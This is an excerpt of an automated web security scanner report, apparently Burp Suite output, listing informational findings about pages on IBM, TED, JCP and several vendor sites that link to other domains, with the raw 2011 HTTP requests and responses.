Content-Length: 14815
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head><meta htt
...[SNIP]...
ra.org/ratingsv02.html" l gen true r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true r (n 0 s 0 v 0 l 0) "http://www.classify.org/safesurf/" l gen true r (SS~~000 1))' />

<link rel="schema.DC" href="http://purl.org/DC/elements/1.0/" />

<link rel="SHORTCUT ICON" href="http://www.ibm.com/favicon.ico" />
...[SNIP]...
</title>


<link href="//dw1.s81c.com/common/v16/css/all.css" media="all" rel="stylesheet" title="www" type="text/css" />

<link href="//dw1.s81c.com/common/v16/css/screen.css" media="screen,projection" rel="stylesheet" title="www" type="text/css" />

<link href="//dw1.s81c.com/common/v16/css/screen-uas.css" media="screen,projection" rel="stylesheet" title="www" type="text/css" />

<link href="//dw1.s81c.com/common/v16/css/zz/en/screen-fonts.css" media="screen,projection" rel="stylesheet" title="www" type="text/css" />

<link href="//dw1.s81c.com/common/v16/css/handheld.css" media="handheld" rel="stylesheet" title="www" type="text/css" />

<link href="//dw1.s81c.com/common/v16/css/print.css" media="print" rel="stylesheet" title="www" type="text/css" />


<!-- xM Masthead/Footer -->

<link href="//dw1.s81c.com/developerworks/css/dw-mf/dw-mf.css" rel="stylesheet" title="www" type="text/css"/>

<link href="//dw1.s81c.com/developerworks/css/dw-mf/dw-mf-slim.css" rel="stylesheet" title="www" type="text/css"/>


<script src="//dw1.s81c.com/common/js/ibmcommon.js" type="text/javascript">//</script>

<script src="//dw1.s81c.com/common/js/dynamicnav.js" type="text/javascript">//</script>
...[SNIP]...
<a href="http://www.ibm.com/us/en/"><img src="//dw1.s81c.com/developerworks/i/mf/ibm-smlogo.gif" width="44" height="16" alt="IBM.." /></a>
...[SNIP]...
<a href="http://www.ibm.com/developerWorks/"><img src="//dw1.s81c.com/developerworks/i/mf/dw-wordmark.gif" width="218" height="32" alt="developerWorks.." /></a>
...[SNIP]...
<label for="q"><img alt="Search developerWorks" height="1" width="1" src="//dw1.s81c.com/i/c.gif" /></label>
...[SNIP]...

17.155. http://www.ibm.com/search/csass/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /search/csass/search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/csass/search?q=faq+help+phone+xss&cc=us&en=utf&co=us&sn=mh&lang=en&lo=any&hpp=100 HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search?sn=mh&q=faq%20help%20phone%20xss&lang=en&cc=us&en=utf
Cookie: IBMCSACOOKIE=unknown-Qio3QRdmTmRds9wLjxSq85quQNDMBtIsFvFfdWFBh0E=--; IBMCSACOOKIE=unknown-Qio3QRdmTmRds9wLjxSq85quQNDMBtIsFvFfdWFBh0E=--; IBMCSACOOKIE=unknown-Qio3QRdmTmRds9wLjxSq85quQNDMBtIsFvFfdWFBh0E=--; ibmSurvey=1316220781236; pSite=http%3A//www-935.ibm.com/services/us/igs/smarterdatacenter.html%3Flnk%3Dmhse; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0002j3sYasrksnFK9PMxmyWhgQF:24APQFEC5N:-1478IK; JSESSIONID=0000BHX9VBiw2pkdoj0QKb4kAfq:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:58:30 GMT
Server: IBM_HTTP_Server
Vary: User-Agent
Set-Cookie: IBMCSACOOKIE=unknown-Qio3QRdmTmRds9wLjxSq85quQNDMBtIsFvFfdWFBh0E=--
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=3600, no-cache=set-cookie
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Vary: User-Agent, Accept-Encoding
Content-Length: 152450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Assign pageType -->


<!-- properties.ftl--><html xmlns="http://www.w3.org/1999
...[SNIP]...
cra.org/ratingsv02.html" l gen true r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true r (n 0 s 0 v 0 l 0) "http://www.classify.org/safesurf/" l gen true r (SS~~000 1))' />
<link rel="schema.DC" href="http://purl.org/DC/elements/1.0/"/>
<link rel="SHORTCUT ICON" href="http://www.ibm.com/favicon.ico"/>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-7"
                                                   href="http://infolib.lotus.com/resources/quickr/domino/8.5.0/doc/qd85badd004/en_us/domino_html_wrapper_nonav.html"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       Lotus Quickr 8.5 for Domino
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-17"
                                                   href="http://www-10.lotus.com/ldd/nflsblog.nsf/dx/such-quickr-mar2010?opendocument&comments"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       IBM developerWorks : Lotus : Notes from Lotus <strong>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-19"
                                                   href="http://www-10.lotus.com/ldd/pfwiki.nsf/dx/Dojo_Rich_Text_Editor_builder_inputs_wpf701"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       Dojo Rich Text Editor builder inputs
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-20"
                                                   href="http://www-10.lotus.com/ldd/nflsblog.nsf/dx/SUCH-WPS-WCM-may2010?opendocument&comments"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       IBM developerWorks : Lotus : Notes from Lotus <strong>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-22"
                                                   href="http://www-10.lotus.com/ldd/dominowiki.nsf/dx/iNotes_Enhancements"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       iNotes Enhancements
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-43"
                                                   href="https://info2.lotus.com/kp/content/Connections25/cn_25_mobile_refcard_using.dita"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       IBM Lotus Connections 2.5 Mobile Reference Card - IBM Knowledge Center
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-53"
                                                   href="http://www-10.lotus.com/ldd/dominowiki.nsf/dx/Lotus_Notes_Traveler_851_FP3_Release_Notes"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       Lotus Notes Traveler 851 FP3 Release Notes
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-57"
                                                   href="http://www-10.lotus.com/ldd/portalwiki.nsf/xsp/.ibmmodres/domino/OpenAttachment/ldd/portalwiki.nsf/999050D26A52CF32852578330058919F/attach/Accelerating_Web2_Coll_wPortal7.pdf"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       Accelerating Web 2.0 Collaboration within WebSphere Portal 7.0
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-62"
                                                   href="http://infolib.lotus.com/resources/portletfactory/7.0.0/doc/pf700abd001/en_us/designer_builderref-html-wrapper.htm"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       IBM WebSphere Portlet Factory 7 Builder Reference
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-65"
                                                   href="https://info2.lotus.com/kp/content/QuickrDomino/trouble/ts_contactingsupport.dita"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       Contacting IBM <strong>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-67"
                                                   href="https://greenhouse.lotus.com/dogear/click?link=bfebd748-866b-451c-90be-0d44ed4bdfe1"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       Customizing Lotus Connections 2.0
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-69"
                                                   href="http://infolib.lotus.com/resources/connections/3.0.0/doc/lc300abd001/en_us/html-wrapper.html"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       Lotus Connections 3 Product Documentation
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-71"
                                                   href="http://www-10.lotus.com/ldd/portalwiki.nsf/dx/Accelerating_Web_2.0_Collaboration-Functional_Benefit"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       Accelerating Web 2.0 Collaboration - Functional Benefit
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-83"
                                                   href="http://infolib.lotus.com/resources/portal/7.0.0/doc/en_us/pt700abd004/html-wrapper-wcm.html"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       IBM Web Content Manager
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-84"
                                                   href="http://infolib.lotus.com/resources/portal/7.0.0/doc/en_us/pt700abd004/html-wrapper-wcm-accessible.html"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       Lotus Web Content Management
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-85"
                                                   href="http://infolib.lotus.com/resources/portletfactory/7.0.1/docs/pf701abd001/en_us/designer_builderref-html-wrapper.htm"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       IBM WebSphere Portlet Factory 7.0.1 Builder Reference
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-94"
                                                   href="http://infolib.lotus.com/resources/quickr/domino/8.5.1/doc/en_us/quickr_domino_html_wrapper_nonav.html"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       IBM logoLotus Quickr 8.5.1 for Domino
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-97"
                                                   href="http://www-10.lotus.com/ldd/portalwiki.nsf/0/EB6D28729E6072E5852576A8006A0A8C/$FILE/Creating%20External%20Facing%20Web%20Sites%20with%20WebSphere%20Portal.pdf"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       Creating External Facing Web Sites with WebSphere Portal
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-99"
                                                   href="http://infolib.lotus.com/resources/connections/3.0.1/doc/lc301abd001/en_us/html-wrapper.html"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       IBM Connections 3.0.1 Product Documentation
                                               </a>
...[SNIP]...
<h2>
                                               <a id="ibm-csa-result-link-100"
                                                   href="http://www-10.lotus.com/ldd/dominowiki.nsf/0/64D2673D04E063B8852576870062E0B1/$FILE/Lotus_Notes_and_Domino_V8.5_Deployment_Guide.pdf"
                                                   class="ibm-feature-link"
                                                   title="">

                                                       Lotus Notes and Domino version 8.5 Deployment Guide
                                               </a>
...[SNIP]...

17.156. http://www.ibm.com/search/csass/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /search/csass/search/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/tivoli/library/s-csscript/
Cookie: IBMCSACOOKIE=unknown-Qio3QRdmTmRds9wLjxSq85quQNDMBtIsFvFfdWFBh0E=--; ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:34 GMT
Server: IBM_HTTP_Server
Vary: User-Agent
Set-Cookie: IBMCSACOOKIE=unknown-Qio3QRdmTmRds9wLjxSq85quQNDMBtIsFvFfdWFBh0E=--
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=3600, no-cache=set-cookie
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Vary: User-Agent, Accept-Encoding
Content-Length: 63016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- properties.ftl--><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="
...[SNIP]...
cra.org/ratingsv02.html" l gen true r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true r (n 0 s 0 v 0 l 0) "http://www.classify.org/safesurf/" l gen true r (SS~~000 1))' />
<link rel="schema.DC" href="http://purl.org/DC/elements/1.0/"/>
<link rel="SHORTCUT ICON" href="http://www.ibm.com/favicon.ico"/>
...[SNIP]...
<link href="/search/csa/base/css/search.css" media="screen,projection" rel="stylesheet" title="www" type="text/css" />
<link href="//dw1.s81c.com/developerworks/css/dw-mf/dw-mf0311.css" rel="stylesheet" title="www" type="text/css"/>

<script type="text/javascript">
...[SNIP]...
<a href="http://www.ibm.com/us/en/"><img src="//dw1.s81c.com/developerworks/i/mf/ibm-smlogo.gif" width="44" height="16" alt="IBM.." /></a>
...[SNIP]...
</a><img class="dw-preload" src="//dw1.s81c.com/developerworks/i/mf/arrow-down-active.gif" width="8" height="7" alt="" />
           </li>
...[SNIP]...
<a href="http://www.ibm.com/developerWorks/"><img src="//dw1.s81c.com/developerworks/i/mf/dw-wordmark.gif" width="218" height="32" alt="developerWorks.." /></a>
...[SNIP]...
<label for="q"><img alt="Search developerWorks" height="1" width="1" src="//dw1.s81c.com/i/c.gif" /></label>
...[SNIP]...
<li><a class="ibm-external-link" href="http://www.google.com/search?ie=utf-8&oe=utf-8&q=developerworks+xss">Google</a>
...[SNIP]...
<li><a class="ibm-external-link" href="http://www.bing.com/search?mkt=en-us&q=developerworks+xss">Bing</a>
...[SNIP]...
<li><a class="ibm-external-link" href="http://search.yahoo.com/search?ei=UTF-8&p=developerworks+xss">Yahoo!</a>
...[SNIP]...
<li><a id="dw-foot-1-0" class="ibm-facebook-link" href="http://www.facebook.com/developerworks">Facebook</a>
...[SNIP]...
<li><a class="ibm-twitter-link" href="http://twitter.com/developerWorks">Twitter</a>
...[SNIP]...
<!-- metrics.ftl ends -->
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/jquery.tools.min.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/jquery.jscroll.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/dw_v16.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/flash-detect.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/dwsi.js">//</script>
...[SNIP]...

17.157. http://www.itoncommand.com/GetAQuote.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itoncommand.com
Path:   /GetAQuote.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /GetAQuote.aspx?utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign%20 HTTP/1.1
Host: www.itoncommand.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop#pq=vdi&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=7&gs_id=w&xhr=t&q=vdi+hosting&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=vdi+hos&aq=0&aqi=g1g-v3&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1087&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 17 Sep 2011 00:25:45 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Cache-Control: private
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Vary: Accept-Encoding
Content-Length: 38069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml">

<head><meta name="
...[SNIP]...
<noscript>
<img src="https://27.xg4ken.com/media/redir.php?track=1&token=7a824604-6d82-4048-a8bd-c1008da1556e&type=conv&val=0.0&orderId=&promoCode=&valueCurrency=USD" width="1" height="1">
</noscript>
...[SNIP]...
<td align="center">
                   <a href="http://www.facebook.com/pages/Denver-CO/ITonCommand/129453791188">
           <img alt="ITonCommand on Facebook" height="32" src="images/Facebook_badge_ITonCommand.gif" width="125" class="style19" />
...[SNIP]...
<br />
                   <a href="http://www.twitter.com/itoncommand">
           <img alt="Follow ITonCommand on Twitter" class="style19" height="36" src="images/Twitter_follow_bird_us-b.png" width="100" />
...[SNIP]...

17.158. http://www.jcp.org/en/jsr/detail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jcp.org
Path:   /en/jsr/detail

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en/jsr/detail?id=234 HTTP/1.1
Host: www.jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/java/find/standards/

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 16 Sep 2011 19:56:53 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 35759


<!-- ** BEGIN: header.jsp ** //-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

...[SNIP]...
</a> &nbsp;|&nbsp;
           <a href="http://java.com/java/download/index.jsp?cid=jdp78399">Get Java Here</a>
...[SNIP]...
<div class="ads">
<a href="http://java.com/java/download/index.jsp?cid=jdp78399" target="_blank"><img style="display: ;" src="/images/ad_banner2.gif" alt="Ad Banner" border="1" height="70" width="150">
...[SNIP]...
</a>. <a href="http://www.sun.com/privacy/">Privacy Policy</a>. <a href="http://www.sun.com/suntrademarks">Trademarks</a>
...[SNIP]...

17.159. http://www.matrix42.com/downloads/wp-vdi-demystified/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.matrix42.com
Path:   /downloads/wp-vdi-demystified/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /downloads/wp-vdi-demystified/?gclid=CLGJxqyCo6sCFWYbQgodY3FG1w HTTP/1.1
Host: www.matrix42.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop#pq=vdi&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=7&gs_id=w&xhr=t&q=vdi+hosting&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=vdi+hos&aq=0&aqi=g1g-v3&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1087&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:25:32 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 48990
Content-Type: text/html; charset=iso-8859-1

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
<div id="flags"><a href="http://www.matrix42.de/downloads/wp-vdi-demystified/?gclid=CLGJxqyCo6sCFWYbQgodY3FG1w"><img src="fileadmin/templates/matrix42_mainTemplate_2010_FILES/icon_de-0.gif" width="16" height="11" border="0" style='margin: 8px 0px 0px 10px' name=lang_de onMouseOut=MM_swapImgRestore() onMouseOver
...[SNIP]...
<p style="margin-top: 30px;"><a href="http://on.fb.me/fWcNLL" target="_blank" ><img src="fileadmin/icons/facebook-0.png" name="sn_facebook" alt="Facebook" onmouseover="MM_swapImage('sn_facebook','','fileadmin/icons/facebook.png',1)" onmouseout="MM_swapImgRestore()"></a><a href="http://www.twitter.com/matrix42man" target="_blank" ><img src="fileadmin/icons/twitter-0.png" style="margin: 0px 10px;" name="sn_twitter" alt="Twitter" onmouseover="MM_swapImage('sn_twitter','','fileadmin/icons/twitter.png',1)" onmouseout="MM_swapImgRest
...[SNIP]...
</a><a href="http://linkd.in/erDL6W" target="_blank" ><img src="fileadmin/icons/linkedin-0.png" name="sn_linkedin" alt="LinkedIn" onmouseover="MM_swapImage('sn_linkedin','','fileadmin/icons/linkedin.png',1)" onmouseout="MM_swapImgRestore()">
...[SNIP]...

17.160. http://www.mokafive.com/BetterWayVDI  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mokafive.com
Path:   /BetterWayVDI

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /BetterWayVDI?gclid=CLDCgauCo6sCFccaQgodS3zc1A HTTP/1.1
Host: www.mokafive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop#pq=vdi&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=7&gs_id=w&xhr=t&q=vdi+hosting&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=vdi+hos&aq=0&aqi=g1g-v3&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1087&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:25:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 19250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
   <title>VDI the way it should be | MokaFive</title>
   <meta name=
...[SNIP]...
<!-- START predictiveresponse tracking code -->
<script type="text/javascript" src="http://www.client.predictiveresponse.net/trac.js"></script>
...[SNIP]...
</span>

<a href="http://www.facebook.com/home.php#/pages/MokaFive/112100483337?ref=s" onclick="javascript: _gaq.push(['_trackPageview', '/external/facebook']);" target="_blank" class="icon facebook" title="Friend Us on Facebook">Friend Us on Facebook</a>

<a href="http://twitter.com/mokafive" onclick="javascript: _gaq.push(['_trackPageview', '/external/twitter']);" target="_blank" class="icon twitter" title="Follow us on Twitter">Follow us on Twitter</a>

<a href="http://www.linkedin.com/groups?about=&amp;gid=2958238&amp;trk=anet_ug_grppro" onclick="javascript: _gaq.push(['_trackPageview', '/external/linkedin']);" target="_blank" class="icon linkedin" title="Join our group on LinkedIn">Join our group on LinkedIn</a>
...[SNIP]...
<p><a href="http://www.youtube.com/embed/kMkkSZ6sHBo?rel=0&amp;wmode=transparent&amp;autoplay=1" onclick="javascript: _gaq.push(['_trackPageview', '/youtube/vdi']); return hs.htmlExpand(this, {objectType: 'iframe', width: 640, height: 414, allowSizeReduction: false, wrapperClassName: 'draggable-header no-footer', preserveContent: false, objectLoadTime: 'after'})" class="highslide">
           <img src="/i/landing/vdi_video_280.jpg" width="280" height="154" alt="Compare server- to client-side VDI!" title="Compare server- to client-side VDI!" />
...[SNIP]...
<p><a href="http://www.youtube.com/embed/UgTB-7gL-wE?rel=0&amp;wmode=transparent&amp;autoplay=1" onclick="javascript: _gaq.push(['_trackPageview', '/youtube/demo']); return hs.htmlExpand(this, {objectType: 'iframe', width: 640, height: 414, allowSizeReduction: false, wrapperClassName: 'draggable-header no-footer', preserveContent: false, objectLoadTime: 'after'})" class="highslide">
           <img src="/i/landing/demo_video_280.jpg" width="280" height="154" alt="See MokaFive in action!" title="See MokaFive in action!" />
...[SNIP]...
<!-- LeadForce1 -->
<a href="http://www.leadforce1.com" title="open source Google Analytics" onclick="window.open(this.href);return(false);">
<script type="text/javascript" language="javascript">
...[SNIP]...

17.161. http://www.redbooks.ibm.com/cgi-bin/searchsite.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redbooks.ibm.com
Path:   /cgi-bin/searchsite.cgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-bin/searchsite.cgi?query=xss HTTP/1.1
Host: www.redbooks.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:48 GMT
Server: Lotus-Domino
Content-type: text/html
Connection: close
Content-Length: 13458

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta name="robots" content="noindex">
<meta http-equiv="Content-Type" content="tex
...[SNIP]...
icra.org/ratingsv02.html" l gen true r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true r (n 0 s 0 v 0 l 0) "http://www.classify.org/safesurf/" l gen true r (SS~~000 1))' />
<link rel="schema.DC" href="http://purl.org/DC/elements/1.0/"/>
<link rel="SHORTCUT ICON" href="http://www.redbooks.ibm.com/favicon.ico"/>
...[SNIP]...

17.162. http://www.ted.com/js/library.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ted.com
Path:   /js/library.min.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /js/library.min.js?1316119359 HTTP/1.1
Host: www.ted.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ted.com/webcast/archive/event/ibmwatson
Cookie: symfony=6rh1uq799n643l7plr6irjcis1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:54:13 GMT
Content-Type: application/x-javascript
Last-Modified: Thu, 15 Sep 2011 20:41:52 GMT
Connection: keep-alive
Expires: Sun, 16 Oct 2011 19:54:13 GMT
Cache-Control: max-age=2592000
Content-Length: 254325

